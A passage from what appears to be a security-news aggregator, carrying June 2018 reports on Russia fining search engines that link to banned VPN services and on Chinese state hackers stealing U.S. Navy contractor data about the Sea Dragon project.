“The problem is that the risk of miscalculation is huge,” Hannigan warned.

Search Engines in Russia cannot link to banned VPN services and Internet proxy services
10.6.2018 securityaffairs BigBrothers 

Russia strengthens online censorship by announcing fines for search engines that link to VPN services banned in the country.
The Russian government has approved a new bill that punishes search engines that are not aligned with Moscow and that let users find VPN services and anonymization tools for circumventing censorship.

According to the amendments to the Code of Administrative Offenses of the Russian Federation, fines will also be imposed on search engines that keep returning results for sites listed in the up-to-date database of blocked domains.

Fines for individuals will range between 3,000 and 5,000 rubles (roughly $48 to $80), officials will face fines of up to 50,000 rubles (roughly $800), and legal entities will face fines between 500,000 and 700,000 rubles (roughly $8,019 to $11,227).

“The failure of the operator of the search system to connect to this system entails the imposition of an administrative fine on citizens in the amount of three thousand to five thousand rubles; on officials, from thirty thousand to fifty thousand rubles; on legal entities, from five hundred thousand to seven hundred thousand rubles,” reads the press release published by the Duma.

Russians commonly use VPN services and other anonymizing services to access blocked content and bypass censorship; the following graph shows the continuous growth in the number of Tor users in Russia.

[Graph: number of Tor users in Russia]

In 2017, Russia’s parliament voted to ban web tools that could be used by people to surf outlawed websites, and the Duma approved the proposed bill to oblige anyone using an online message service to identify themselves with a telephone number.

The bill prohibited the use of any service from the Russian territory if they could be used to access blacklisted websites.

VPN operators and proxy services operating in the country must register themselves with the government regulatory authority.

Since May 3rd, 2018, Russia's media and communications regulator Roskomnadzor has blocked over 50 virtual private networks (VPNs), web proxies and anonymizing networks.

However, many VPNs and Internet proxy services still haven't complied with the law by registering themselves, which is why Moscow has introduced fines for search engines.

The Russian communications watchdog Roskomnadzor will also provide a Federal State Information System (FGIS) containing the list of banned websites and services in the country, and search engines will need to update the results they provide by connecting to FGIS.

Search engines have 30 days to be aligned with Federal State Information System (FGIS) if the service providers

Those who fail to connect to this system will also face fines similar to those detailed above.

In May, the Anonymous collective hacked and defaced the subdomain of the Russia’s Federal Agency for International Cooperation (Rossotrudnichestvo) site to protest against the government censorship, with a specific reference to the ban on Telegram.

Chinese state-sponsored hackers steal 600GB U.S. Navy data
9.6.2018 securityaffairs BigBrothers 

According to a report published by The Washington Post, Chinese hackers have stolen a huge trove of sensitive data from a U.S. Navy contractor.
China-linked hackers have stolen a huge trove of sensitive data from a U.S. Navy contractor, the Washington Post reported Friday. The threat actors stole more than 614 gigabytes of data including secret plans to develop a new type of submarine-launched anti-ship missile.

The Washington Post was informed by government officials that spoke on the condition of anonymity.

According to the Washington Post, the security breach took place in January and February; the hackers belong to a division of the Chinese Ministry of State Security operating out of the Chinese province of Guangdong.

The report doesn't reveal the name of the U.S. Navy contractor, only that it works for the Naval Undersea Warfare Center, based in Newport, Rhode Island.

“Chinese government hackers have compromised the computers of a Navy contractor, stealing massive amounts of highly sensitive data related to undersea warfare — including secret plans to develop a supersonic anti-ship missile for use on U.S. submarines by 2020, according to American officials.” states the report published by the Washington Post.

“The hackers targeted a contractor who works for the Naval Undersea Warfare Center, a military organization headquartered in Newport, R.I., that conducts research and development for submarines and underwater weaponry.”

Stolen data included unclassified information relating to submarine cryptographic systems, signals and sensor data, and a project called Sea Dragon.

Project Sea Dragon was launched by the Pentagon to adapt existing US military technologies to new applications; the US Government has spent more than $300 million on the initiative since late 2015.

“The Defense Department, citing classification levels, has released little information about Sea Dragon other than to say that it will introduce a “disruptive offensive capability” by “integrating an existing weapon system with an existing Navy platform.” continues the post.

“The Pentagon has requested or used more than $300 million for the project since late 2015 and has said it plans to start underwater testing by September.”


At the time, the U.S. Navy did not comment on the incident, citing security reasons.

“There are measures in place that require companies to notify the government when a ‘cyber incident’ has occurred that has actual or potential adverse effects on their networks that contain controlled unclassified information.” said Cmdr. Bill Speaks, a U.S. Navy spokesman,

“it would be inappropriate to discuss further details at this time.”

“Evolving cyber threats are serious matters and we are continuously bolstering our cybersecurity culture by focusing on awareness of the cyber threat, and the adequacy of our cyber defenses and information technology capabilities,” he told AFP.

This incident is only the latest of its kind: Chinese hackers have in the past stolen sensitive information from the US military, including the blueprints of the F-35 stealth fighter, the advanced Patriot PAC-3 missile system, and other highly secret projects.

Chinese Government Hackers Steal Trove of U.S. Navy Data: Report

9.6.2018 securityweek BigBrothers

Chinese government hackers have stolen a massive trove of sensitive information from a US Navy contractor, including secret plans to develop a new type of submarine-launched anti-ship missile, the Washington Post reported Friday.

Investigators told the newspaper that breaches were executed in January and February by a division of the Chinese Ministry of State Security, operating out of the Chinese province of Guangdong.

The contractor, which was not named in the report, works for the Naval Undersea Warfare Center, based in Newport, Rhode Island. It conducts research and development for submarines and underwater weapons systems.

According to the Post, hackers swiped 614 gigabytes of data that included information relating to sensors, submarine cryptographic systems and a little-known project called Sea Dragon.

The Pentagon has not said much about Sea Dragon, launched in 2012, except that it is aimed at adapting existing military technologies to new uses.

At the Navy's request, the Post withheld information about the compromised new missile system, but said it was for a supersonic anti-ship missile that could be launched from submarines.

Navy spokesman Commander Bill Speaks declined to confirm the Post report, citing security reasons.

"Evolving cyber threats are serious matters and we are continuously bolstering our cybersecurity culture by focusing on awareness of the cyber threat, and the adequacy of our cyber defenses and information technology capabilities," he told AFP.

Chinese hackers have for years targeted the US military to steal information and the Pentagon says they have previously swiped crucial data on the new F-35 stealth fighter, the advanced Patriot PAC-3 missile system and other highly sensitive projects.

News of the hack comes amid rising tensions between Beijing and Washington on a range of issues including trade and military matters.

The Pentagon last month pulled its invitation for China to join maritime exercises in the Pacific because of Beijing's "continued militarization" of the South China Sea.